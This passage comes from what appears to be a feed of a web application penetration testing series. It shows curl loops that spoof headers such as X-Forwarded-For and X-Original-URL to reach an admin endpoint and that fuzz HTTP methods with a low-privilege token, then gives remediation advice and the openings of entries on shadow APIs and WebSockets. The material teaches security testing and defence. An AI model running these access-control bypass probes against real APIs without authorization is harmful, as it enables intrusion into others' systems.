style="color:#e6db74">&#34;X-Original-URL&#34;</span> <span style="color:#e6db74">&#34;X-Rewrite-URL&#34;</span> <span style="color:#e6db74">&#34;X-Custom-IP-Authorization&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;X-Forwarded-For&#34;</span> <span style="color:#e6db74">&#34;X-Forward-For&#34;</span> <span style="color:#e6db74">&#34;X-Remote-IP&#34;</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> curl -s -H <span style="color:#e6db74">&#34;</span>$h<span style="color:#e6db74">: 127.0.0.1&#34;</span> <span style="color:#e6db74">&#34;https://api.target.com/admin/users&#34;</span> | head -5 </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># HTTP method fuzzing:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> status<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -so /dev/null -w <span style="color:#e6db74">&#34;%{http_code}&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -X <span style="color:#e6db74">&#34;</span>$method<span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;https://api.target.com/v1/users/1337&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer LOW_PRIV_TOKEN&#34;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;</span>$method<span style="color:#e6db74">: </span>$status<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>BOLA</strong>: validate object ownership on every request — not just authentication</li> <li><strong>BFLA</strong>: enforce function-level authorization server-side — client-side hiding is not protection</li> <li><strong>Mass Assignment</strong>: use allowlists for accepted fields — never auto-bind all request body fields</li> <li><strong>Rate Limiting</strong>: apply per user, per IP, and per endpoint — use token bucket or sliding window algorithms</li> <li><strong>Excessive Data Exposure</strong>: return only the fields needed — use response DTOs, never serialise full DB models</li> <li><strong>Shadow APIs</strong>: inventory and decommission old API versions; redirect with 301 or return 410 Gone</li> <li><strong>API Documentation</strong>: restrict Swagger/OpenAPI access to internal network or require authentication</li> <li><strong>Versioning strategy</strong>: when deprecating, enforce authorization controls on old versions equally</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> Shadow APIs & Zombie Endpoints https://az0th.it/web/api/115-api-shadow-zombie/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/api/115-api-shadow-zombie/ <h1 id="shadow-apis--zombie-endpoints">Shadow APIs &amp; Zombie Endpoints</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-200, CWE-284 <strong>OWASP</strong>: A09:2021 – Security Logging and Monitoring Failures | A01:2021 – Broken Access Control</p> </blockquote> <hr> <h2 id="what-are-shadow-apis">What Are Shadow APIs?</h2> <p>Shadow APIs (also called zombie or undocumented APIs) are endpoints that exist in a running application but are not included in the official API documentation, not monitored by security teams, and often not protected by the same controls as documented APIs. They fall into several categories:</p> WebSocket Protocol Security (Deep Dive) https://az0th.it/web/api/113-api-websockets-deep/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/api/113-api-websockets-deep/ <h1 id="websocket-protocol-security-deep-dive">WebSocket Protocol Security (Deep Dive)</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-345, CWE-284, CWE-89 <strong>OWASP</strong>: A01:2021 – Broken Access Control | A03:2021 – Injection</p> </blockquote> <hr> <h2 id="websocket-protocol-vs-http">WebSocket Protocol vs. HTTP</h2> <p>WebSocket (RFC 6455) establishes a <strong>persistent, bidirectional, full-duplex channel</strong> over a single TCP connection. After the HTTP/1.1 upgrade handshake, the protocol operates independently of HTTP — separate authentication model, separate framing, separate proxy behavior. This creates attack surface that HTTP-focused defenses miss.</p> <p>Key differences from HTTP:</p>